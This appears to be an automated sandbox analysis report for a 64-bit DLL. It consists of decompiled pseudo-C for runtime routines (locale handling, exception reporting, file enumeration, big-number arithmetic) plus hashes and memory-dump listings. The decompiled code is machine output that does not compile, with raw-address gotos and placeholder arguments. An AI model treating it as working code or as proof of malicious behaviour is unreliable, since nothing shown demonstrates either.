                                                                      				signed long long _t116;
                                                                      				signed long long _t117;
                                                                      				intOrPtr* _t118;
                                                                      				intOrPtr* _t119;
                                                                      				intOrPtr* _t120;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr* _t122;
                                                                      				void* _t125;
                                                                      				intOrPtr* _t126;
                                                                      				signed long long _t134;
                                                                      				signed long long _t136;
                                                                      				void* _t147;
                                                                      				void* _t148;
                                                                      				signed long long _t149;
                                                                      				void* _t151;
                                                                      				void* _t159;
                                                                      				long long _t161;
                                                                      				intOrPtr* _t163;
                                                                      
                                                                      				_t159 = __r9;
                                                                      				_t141 = __rdx;
                                                                      				_t73 = __ecx;
                                                                      				_t116 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t117 = _t116 ^ _t151 - 0x00000040;
                                                                      				_v72 = _t117;
                                                                      				_t147 = __r8;
                                                                      				_t163 = __rdx;
                                                                      				_t161 = __rcx;
                                                                      				E0000000118003CFF0(_t117, _t125, __rdx, _t148);
                                                                      				_t149 = _t117;
                                                                      				_v88 = _t117;
                                                                      				_v80 = 0;
                                                                      				E0000000118003CFF0(_t117, _t125, _t141, _t149);
                                                                      				r12d = 0;
                                                                      				_t5 = _t149 + 0xa0; // 0xa0
                                                                      				_t126 = _t5;
                                                                      				 *((long long*)(_t117 + 0x3a0)) =  &_v88;
                                                                      				_t118 = _t161 + 0x80;
                                                                      				 *((long long*)(_t149 + 0x98)) = _t161;
                                                                      				 *_t126 = _t118;
                                                                      				if (_t118 == 0) goto 0x8004c98f;
                                                                      				if ( *_t118 == r12w) goto 0x8004c98f;
                                                                      				_t82 =  *0x80062160; // 0x17
                                                                      				E0000000118004C888(_t82 - 1, _t126, 0x80061ff0, _t149, _t151, _t126);
                                                                      				_v88 = r12d;
                                                                      				_t119 =  *((intOrPtr*)(_t149 + 0x98));
                                                                      				if (_t119 == 0) goto 0x8004ca18;
                                                                      				if ( *_t119 == r12w) goto 0x8004ca18;
                                                                      				_t120 =  *_t126;
                                                                      				if (_t120 == 0) goto 0x8004c9be;
                                                                      				if ( *_t120 == r12w) goto 0x8004c9be;
                                                                      				E0000000118004C1D4(_t73, _t82 - 1, _t120, _t126,  &_v88, _t141, _t126);
                                                                      				goto 0x8004c9c7;
                                                                      				E0000000118004C2A4(_t73, _t82 - 1, _t120, _t126,  &_v88, _t141, _t126);
                                                                      				if (_v88 != r12d) goto 0x8004ca8e;
                                                                      				_t84 =  *0x80061fe0; // 0x41
                                                                      				_t14 = _t149 + 0x98; // 0x98
                                                                      				if (E0000000118004C888(_t84 - 1, _t126, 0x80061bd0, _t149, _t151, _t14) == 0) goto 0x8004ca84;
                                                                      				_t121 =  *_t126;
                                                                      				if (_t121 == 0) goto 0x8004ca0d;
                                                                      				if ( *_t121 == r12w) goto 0x8004ca0d;
                                                                      				E0000000118004C1D4(_t73, _t84 - 1, _t121, _t126,  &_v88, _t141, _t14);
                                                                      				goto 0x8004ca84;
                                                                      				_t134 =  &_v88;
                                                                      				E0000000118004C2A4(_t73, _t84 - 1, _t121, _t126, _t134, _t141, _t14);
                                                                      				goto 0x8004ca84;
                                                                      				_t122 =  *_t126;
                                                                      				if (_t122 == 0) goto 0x8004ca71;
                                                                      				if ( *_t122 == r12w) goto 0x8004ca71;
                                                                      				E0000000118003CFF0(_t122, _t126, _t141, _t149);
                                                                      				_t136 = (_t134 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0xa0)) + _t136 * 2)) != r12w) goto 0x8004ca39;
                                                                      				 *(_t122 + 0xb4) = r12d & 0xffffff00 | _t136 == 0x00000003;
                                                                      				EnumSystemLocalesW(??, ??);
                                                                      				if ((_v88 & 0x00000004) != 0) goto 0x8004ca84;
                                                                      				_v88 = r12d;
                                                                      				goto 0x8004ca84;
                                                                      				_v88 = 0x104;
                                                                      				_t60 = GetUserDefaultLCID();
                                                                      				_v80 = _t60;
                                                                      				_v84 = _t60;
                                                                      				if (_v88 == r12d) goto 0x8004cb69;
                                                                      				asm("dec eax");
                                                                      				_t61 = E0000000118004C708(_t126, 0x18004c068 & _t161 + 0x00000100,  &_v88, _t149);
                                                                      				if (_t61 == 0) goto 0x8004cb69;
                                                                      				if (IsValidCodePage(??) == 0) goto 0x8004cb69;
                                                                      				if (IsValidLocale(??, ??) == 0) goto 0x8004cb69;
                                                                      				if (_t163 == 0) goto 0x8004cae0;
                                                                      				 *_t163 = _t61;
                                                                      				_t36 = _t149 + 0x2f0; // 0x2f0
                                                                      				r9d = 0;
                                                                      				_t37 = _t159 + 0x55; // 0x55
                                                                      				_t90 = _t37;
                                                                      				r8d = _t90;
                                                                      				E00000001180047928(_v84, _t163, _t161 + 0x100, _t126, _t36, _t149, _t151);
                                                                      				if (_t147 == 0) goto 0x8004cb62;
                                                                      				r9d = 0;
                                                                      				r8d = _t90;
                                                                      				E00000001180047928(_v84, _t147, _t161 + 0x100, _t126, _t147 + 0x120, _t149, _t151);
                                                                      				r9d = 0x40;
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004cb69;
                                                                      				r9d = 0x40;
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004cb69;
                                                                      				_t44 = _t149 - 0x36; // 0xa
                                                                      				r9d = _t44;
                                                                      				_t45 = _t149 - 0x30; // 0x10
                                                                      				r8d = _t45;
                                                                      				E000000011800550DC(_t61);
                                                                      				goto 0x8004cb6b;
                                                                      				return E000000011800028F0(0, _t61, _v72 ^ _t151 - 0x00000040);
                                                                      			}


































                                                                      0x18004c908
                                                                      0x18004c908
                                                                      0x18004c908
                                                                      0x18004c91a
                                                                      0x18004c921
                                                                      0x18004c924
                                                                      0x18004c928
                                                                      0x18004c92b
                                                                      0x18004c92e
                                                                      0x18004c931
                                                                      0x18004c936
                                                                      0x18004c93b
                                                                      0x18004c93f
                                                                      0x18004c942
                                                                      0x18004c94b
                                                                      0x18004c94e
                                                                      0x18004c94e
                                                                      0x18004c955
                                                                      0x18004c95c
                                                                      0x18004c963
                                                                      0x18004c96a
                                                                      0x18004c970
                                                                      0x18004c976
                                                                      0x18004c978
                                                                      0x18004c98a
                                                                      0x18004c98f
                                                                      0x18004c993
                                                                      0x18004c99d
                                                                      0x18004c9a3
                                                                      0x18004c9a5
                                                                      0x18004c9ab
                                                                      0x18004c9b1
                                                                      0x18004c9b7
                                                                      0x18004c9bc
                                                                      0x18004c9c2
                                                                      0x18004c9cb
                                                                      0x18004c9d1
                                                                      0x18004c9d7
                                                                      0x18004c9ee
                                                                      0x18004c9f4
                                                                      0x18004c9fa
                                                                      0x18004ca00
                                                                      0x18004ca06
                                                                      0x18004ca0b
                                                                      0x18004ca0d
                                                                      0x18004ca11
                                                                      0x18004ca16
                                                                      0x18004ca18
                                                                      0x18004ca1e
                                                                      0x18004ca24
                                                                      0x18004ca26
                                                                      0x18004ca39
                                                                      0x18004ca41
                                                                      0x18004ca54
                                                                      0x18004ca5f
                                                                      0x18004ca69
                                                                      0x18004ca6b
                                                                      0x18004ca6f
                                                                      0x18004ca71
                                                                      0x18004ca78
                                                                      0x18004ca7e
                                                                      0x18004ca81
                                                                      0x18004ca88
                                                                      0x18004ca9c
                                                                      0x18004caa2
                                                                      0x18004caab
                                                                      0x18004cabc
                                                                      0x18004cad2
                                                                      0x18004cadb
                                                                      0x18004cadd
                                                                      0x18004cae3
                                                                      0x18004caea
                                                                      0x18004caed
                                                                      0x18004caed
                                                                      0x18004caf1
                                                                      0x18004caf4
                                                                      0x18004cafc
                                                                      0x18004cb08
                                                                      0x18004cb0b
                                                                      0x18004cb0e
                                                                      0x18004cb1b
                                                                      0x18004cb2e
                                                                      0x18004cb3a
                                                                      0x18004cb4a
                                                                      0x18004cb55
                                                                      0x18004cb55
                                                                      0x18004cb59
                                                                      0x18004cb59
                                                                      0x18004cb5d
                                                                      0x18004cb67
                                                                      0x18004cb85

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                      • String ID:
                                                                      • API String ID: 2591520935-0
                                                                      • Opcode ID: 8028a76061b3122e43828895d7cffd717e70e32ff2aa1e33f61fdbe745a3d482
                                                                      • Instruction ID: d800f0e155d13a5b5d9f1973c0ee529838c66c7f9ef334be737342517fe22d05
                                                                      • Opcode Fuzzy Hash: 8028a76061b3122e43828895d7cffd717e70e32ff2aa1e33f61fdbe745a3d482
                                                                      • Instruction Fuzzy Hash: EB717E32700A088AFBD2DF61D890BED33A0B74CBCCF458126AE0957695DF38CA59C356
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E0000000118000386C(signed int __ecx, void* __rax, long long __rbx) {
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      				int _t38;
                                                                      				void* _t58;
                                                                      				void* _t76;
                                                                      				long _t79;
                                                                      				void* _t80;
                                                                      				void* _t82;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      
                                                                      				_t58 = __rax;
                                                                      				 *((long long*)(_t82 + 8)) = __rbx;
                                                                      				_t80 = _t82 - 0x4c0;
                                                                      				_t83 = _t82 - 0x5c0;
                                                                      				if (IsProcessorFeaturePresent(_t79) == 0) goto 0x80003896;
                                                                      				asm("int 0x29");
                                                                      				_t35 = E00000001180003864(_t34);
                                                                      				r8d = 0x4d0;
                                                                      				_t36 = E000000011800046A0(_t35, 0, _t80 - 0x10, _t76, _t85);
                                                                      				__imp__RtlCaptureContext();
                                                                      				r8d = 0;
                                                                      				__imp__RtlLookupFunctionEntry();
                                                                      				if (_t58 == 0) goto 0x80003916;
                                                                      				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
                                                                      				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
                                                                      				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
                                                                      				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
                                                                      				__imp__RtlVirtualUnwind();
                                                                      				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
                                                                      				r8d = 0x98;
                                                                      				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
                                                                      				E000000011800046A0(_t36, 0, _t83 + 0x50,  *((intOrPtr*)(_t80 + 0x4d8)),  *((intOrPtr*)(_t80 + 0xe8)));
                                                                      				 *((long long*)(_t83 + 0x60)) =  *((intOrPtr*)(_t80 + 0x4c8));
                                                                      				 *((intOrPtr*)(_t83 + 0x50)) = 0x40000015;
                                                                      				 *((intOrPtr*)(_t83 + 0x54)) = 1;
                                                                      				_t38 = IsDebuggerPresent();
                                                                      				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
                                                                      				 *((long long*)(_t83 + 0x48)) = _t80 - 0x10;
                                                                      				SetUnhandledExceptionFilter(??);
                                                                      				if (UnhandledExceptionFilter(??) != 0) goto 0x800039a6;
                                                                      				if ((__ecx & 0xffffff00 | _t38 == 0x00000001) != 0) goto 0x800039a6;
                                                                      				return E00000001180003864(_t40);
                                                                      			}













                                                                      0x18000386c
                                                                      0x18000386c
                                                                      0x180003872
                                                                      0x18000387a
                                                                      0x180003890
                                                                      0x180003894
                                                                      0x18000389b
                                                                      0x1800038a6
                                                                      0x1800038ac
                                                                      0x1800038b5
                                                                      0x1800038cc
                                                                      0x1800038cf
                                                                      0x1800038d8
                                                                      0x1800038da
                                                                      0x1800038f1
                                                                      0x180003900
                                                                      0x180003909
                                                                      0x180003910
                                                                      0x180003922
                                                                      0x180003932
                                                                      0x18000393c
                                                                      0x180003943
                                                                      0x18000394f
                                                                      0x180003954
                                                                      0x18000395c
                                                                      0x180003964
                                                                      0x180003972
                                                                      0x18000397e
                                                                      0x180003985
                                                                      0x180003998
                                                                      0x18000399c
                                                                      0x1800039b6

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: f9660ed8587c3df6a7b00e871a436ca0efeb4b54521b2071fe43d10319ef90ce
                                                                      • Instruction ID: d78cb371cec2fe12a6535eebe7a7f84b12e828236375665827461d110678fbe1
                                                                      • Opcode Fuzzy Hash: f9660ed8587c3df6a7b00e871a436ca0efeb4b54521b2071fe43d10319ef90ce
                                                                      • Instruction Fuzzy Hash: 0B318472204B888AEBB1DF61E8403DD7365F788784F44842AEA4D57B99EF39C64DC711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E0000000118001360C(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                      				void* _t36;
                                                                      				void* _t37;
                                                                      				void* _t38;
                                                                      				int _t40;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				_Unknown_base(*)()* _t85;
                                                                      				void* _t89;
                                                                      				void* _t90;
                                                                      				void* _t92;
                                                                      				signed long long _t93;
                                                                      				struct _EXCEPTION_POINTERS* _t99;
                                                                      
                                                                      				 *((long long*)(_t92 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t92 + 0x18)) = __rsi;
                                                                      				_t90 = _t92 - 0x4f0;
                                                                      				_t93 = _t92 - 0x5f0;
                                                                      				_t62 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                                                                      				if (__ecx == 0xffffffff) goto 0x8001364b;
                                                                      				_t37 = E00000001180003864(_t36);
                                                                      				r8d = 0x98;
                                                                      				_t38 = E000000011800046A0(_t37, 0, _t93 + 0x70, __rdx, __r8);
                                                                      				r8d = 0x4d0;
                                                                      				E000000011800046A0(_t38, 0, _t90 + 0x10, __rdx, __r8);
                                                                      				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
                                                                      				_t65 = _t90 + 0x10;
                                                                      				 *((long long*)(_t93 + 0x50)) = _t65;
                                                                      				__imp__RtlCaptureContext();
                                                                      				r8d = 0;
                                                                      				__imp__RtlLookupFunctionEntry();
                                                                      				if (_t65 == 0) goto 0x800136de;
                                                                      				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                                                                      				 *((long long*)(_t93 + 0x30)) = _t93 + 0x58;
                                                                      				 *((long long*)(_t93 + 0x28)) = _t93 + 0x60;
                                                                      				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
                                                                      				__imp__RtlVirtualUnwind();
                                                                      				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                                                                      				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                                                                      				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
                                                                      				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                                                                      				 *((intOrPtr*)(_t93 + 0x74)) = r8d;
                                                                      				_t40 = IsDebuggerPresent();
                                                                      				SetUnhandledExceptionFilter(_t85, _t89);
                                                                      				if (UnhandledExceptionFilter(_t99) != 0) goto 0x80013740;
                                                                      				if (_t40 != 0) goto 0x80013740;
                                                                      				if (__ecx == 0xffffffff) goto 0x80013740;
                                                                      				return E000000011800028F0(E00000001180003864(_t42), __ecx,  *(_t90 + 0x4e0) ^ _t93);
                                                                      			}















                                                                      0x18001360c
                                                                      0x180013611
                                                                      0x18001361a
                                                                      0x180013622
                                                                      0x180013629
                                                                      0x180013633
                                                                      0x180013644
                                                                      0x180013646
                                                                      0x180013652
                                                                      0x180013658
                                                                      0x180013663
                                                                      0x180013669
                                                                      0x180013673
                                                                      0x18001367c
                                                                      0x180013680
                                                                      0x180013685
                                                                      0x18001369a
                                                                      0x18001369d
                                                                      0x1800136a6
                                                                      0x1800136a8
                                                                      0x1800136bb
                                                                      0x1800136c8
                                                                      0x1800136d1
                                                                      0x1800136d8
                                                                      0x1800136e5
                                                                      0x1800136f7
                                                                      0x1800136fb
                                                                      0x180013709
                                                                      0x18001370d
                                                                      0x180013711
                                                                      0x18001371b
                                                                      0x18001372e
                                                                      0x180013732
                                                                      0x180013737
                                                                      0x180013766

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 6ba515eba41eaaca452e69af42adb324a6a894a9702a571db70db0aee1680c9a
                                                                      • Instruction ID: fda6f859b8bf68d8055e98cc49fc938b7da6a16bf3d58113224d79175d4a0c86
                                                                      • Opcode Fuzzy Hash: 6ba515eba41eaaca452e69af42adb324a6a894a9702a571db70db0aee1680c9a
                                                                      • Instruction Fuzzy Hash: 89317276214F8486DBA1CF25E8413DE73A4F788794F508126FA9D43B99DF38C25ACB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E00000001180043464(void* __rcx, signed short* __rdx, intOrPtr* __r8) {
                                                                      				signed int _v72;
                                                                      				intOrPtr _v616;
                                                                      				signed short _v618;
                                                                      				char _v620;
                                                                      				void* _v664;
                                                                      				intOrPtr _v672;
                                                                      				long long _v680;
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* __r15;
                                                                      				signed int _t26;
                                                                      				signed int _t35;
                                                                      				void* _t41;
                                                                      				void* _t45;
                                                                      				signed long long _t55;
                                                                      				void* _t57;
                                                                      				void* _t59;
                                                                      				signed short* _t72;
                                                                      				void* _t86;
                                                                      				signed long long _t87;
                                                                      				long long _t95;
                                                                      				signed long long _t97;
                                                                      
                                                                      				_t55 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v72 = _t55 ^ _t87;
                                                                      				if (__rdx == __rcx) goto 0x800434bc;
                                                                      				_t41 = ( *__rdx & 0x0000ffff) - 0x2f - 0x2d;
                                                                      				if (_t41 > 0) goto 0x800434b3;
                                                                      				asm("dec ecx");
                                                                      				if (_t41 < 0) goto 0x800434bc;
                                                                      				_t72 = __rdx - 2;
                                                                      				if (_t72 != __rcx) goto 0x8004349d;
                                                                      				_t35 =  *_t72 & 0x0000ffff;
                                                                      				if (_t35 != 0x3a) goto 0x800434e3;
                                                                      				_t57 = __rcx + 2;
                                                                      				if (_t72 == _t57) goto 0x800434e3;
                                                                      				r8d = 0;
                                                                      				E00000001180042F88(_t59, __rcx, _t72, __rcx, 0x801, __r8);
                                                                      				goto 0x800435d1;
                                                                      				r12d = 0;
                                                                      				_t45 = _t35 - 0x2f - 0x2d;
                                                                      				if (_t45 > 0) goto 0x800434fb;
                                                                      				asm("dec ecx");
                                                                      				if (_t45 < 0) goto 0x800434fe;
                                                                      				_v672 = r12d;
                                                                      				_v680 = _t95;
                                                                      				asm("dec ebp");
                                                                      				r9d = 0;
                                                                      				FindFirstFileExW(??, ??, ??, ??, ??, ??);
                                                                      				if (_t57 == 0xffffffff) goto 0x800434ce;
                                                                      				if (_v620 != 0x2e) goto 0x80043560;
                                                                      				_t26 = _v618 & 0x0000ffff;
                                                                      				if (_t26 == 0) goto 0x80043579;
                                                                      				if (_t26 != 0x2e) goto 0x80043560;
                                                                      				if (_v616 == r12w) goto 0x80043579;
                                                                      				if (E00000001180042F88(_t57,  &_v620, __rcx, __rcx, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001, __r8) != 0) goto 0x800435c6;
                                                                      				if (FindNextFileW(??, ??) != 0) goto 0x80043540;
                                                                      				if ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3 !=  *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) goto 0x800435ab;
                                                                      				FindClose(??);
                                                                      				goto 0x800435d1;
                                                                      				r8d = 8;
                                                                      				E00000001180052120(_t57,  *__r8 + ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) * 8, ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) - ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3),  *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3, __rcx, _t86, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001, 0x18004247c, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001);
                                                                      				goto 0x8004359e;
                                                                      				FindClose(??);
                                                                      				return E000000011800028F0(_t27, _t35 - 0x2f, _v72 ^ _t87);
                                                                      			}



























                                                                      0x180043476
                                                                      0x180043480
                                                                      0x18004349b
                                                                      0x1800434a4
                                                                      0x1800434a8
                                                                      0x1800434ad
                                                                      0x1800434b1
                                                                      0x1800434b3
                                                                      0x1800434ba
                                                                      0x1800434bc
                                                                      0x1800434c3
                                                                      0x1800434c5
                                                                      0x1800434cc
                                                                      0x1800434d1
                                                                      0x1800434d9
                                                                      0x1800434de
                                                                      0x1800434e7
                                                                      0x1800434ea
                                                                      0x1800434ee
                                                                      0x1800434f3
                                                                      0x1800434f9
                                                                      0x180043501
                                                                      0x180043511
                                                                      0x18004351b
                                                                      0x18004351e
                                                                      0x180043526
                                                                      0x180043533
                                                                      0x180043546
                                                                      0x180043548
                                                                      0x180043550
                                                                      0x180043556
                                                                      0x18004355e
                                                                      0x180043577
                                                                      0x180043589
                                                                      0x18004359c
                                                                      0x1800435a1
                                                                      0x1800435a9
                                                                      0x1800435b9
                                                                      0x1800435bf
                                                                      0x1800435c4
                                                                      0x1800435c9
                                                                      0x1800435f2

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID: .
                                                                      • API String ID: 1164774033-248832578
                                                                      • Opcode ID: 3acc42bf8028de85f2c817288cd422713ad5ac35a0d91713067625b2f4763009
                                                                      • Instruction ID: aca981826c58a9e89e0b31a9c18f2325146aae2851afa41825e8e1c7781ca2c3
                                                                      • Opcode Fuzzy Hash: 3acc42bf8028de85f2c817288cd422713ad5ac35a0d91713067625b2f4763009
                                                                      • Instruction Fuzzy Hash: 0541EB72310E5C40FAE29B66A8857E9A391E788BE8F45D122BD59077C4EE3CC74D8348
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: LoadResource$String$FindLock
                                                                      • String ID:
                                                                      • API String ID: 2961929873-0
                                                                      • Opcode ID: c12db5ca32142765978bf34af63ee1bcf18d7da4b5d73cec6434683d8aa002e8
                                                                      • Instruction ID: 89ed8166feaad9f79d7af7a9a98f08b2c0ab66d7c61c12a2d92dc69fac014027
                                                                      • Opcode Fuzzy Hash: c12db5ca32142765978bf34af63ee1bcf18d7da4b5d73cec6434683d8aa002e8
                                                                      • Instruction Fuzzy Hash: 7A317C72301549C6EBAADF65D5007ED73A1FB48BC1F54C012BE0987698DE39DA68C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E0000000118004E1C0(signed int __ecx, signed int __rax, signed int* __rcx, unsigned int __rdx, signed int __r9, void* __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
                                                                      				long long _v64;
                                                                      				char _v532;
                                                                      				intOrPtr _v536;
                                                                      				signed long long _v552;
                                                                      				signed int _v560;
                                                                      				signed int _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				intOrPtr _v584;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* _t132;
                                                                      				signed int _t148;
                                                                      				intOrPtr _t161;
                                                                      				signed int _t163;
                                                                      				intOrPtr _t164;
                                                                      				signed int _t180;
                                                                      				signed int _t191;
                                                                      				signed int _t192;
                                                                      				signed int _t213;
                                                                      				void* _t230;
                                                                      				signed long long _t241;
                                                                      				signed int _t244;
                                                                      				void* _t252;
                                                                      				signed int* _t255;
                                                                      				intOrPtr* _t262;
                                                                      				signed long long _t267;
                                                                      				signed long long _t269;
                                                                      				signed long long _t271;
                                                                      				signed long long _t273;
                                                                      				signed long long _t277;
                                                                      				signed long long _t279;
                                                                      				char* _t285;
                                                                      				signed int _t288;
                                                                      				signed long long _t289;
                                                                      				signed long long _t297;
                                                                      				signed long long _t298;
                                                                      				void* _t306;
                                                                      				signed long long _t327;
                                                                      
                                                                      				_a16 = __rdx;
                                                                      				r10d =  *__rcx;
                                                                      				_t278 = __rcx;
                                                                      				if (r10d == 0) goto 0x8004e635;
                                                                      				_t161 =  *__rdx;
                                                                      				_v584 = _t161;
                                                                      				if (_t161 == 0) goto 0x8004e635;
                                                                      				r10d = r10d - 1;
                                                                      				if (_t252 - 1 != 0) goto 0x8004e2f1;
                                                                      				r12d =  *(__rdx + 4);
                                                                      				if (r12d != 1) goto 0x8004e236;
                                                                      				_t6 =  &_v532; // 0xff63
                                                                      				_t255 =  &(__rcx[1]);
                                                                      				 *__rcx = 0;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				E0000000118005053C(__rax, _t252, _t255, __rdx, __rcx, _t6, __r9);
                                                                      				goto 0x8004e637;
                                                                      				if (r10d != 0) goto 0x8004e271;
                                                                      				_t163 = _t255[1];
                                                                      				_t9 =  &_v532; // 0xff63
                                                                      				 *_t255 = 0;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				E0000000118005053C(__rax, _t252,  &(_t255[1]), __rdx, __rcx, _t9, __r9);
                                                                      				_t180 = _t163 % r12d;
                                                                      				__rcx[1] = _t180;
                                                                      				bpl = _t180 != 0;
                                                                      				 *__rcx = 0;
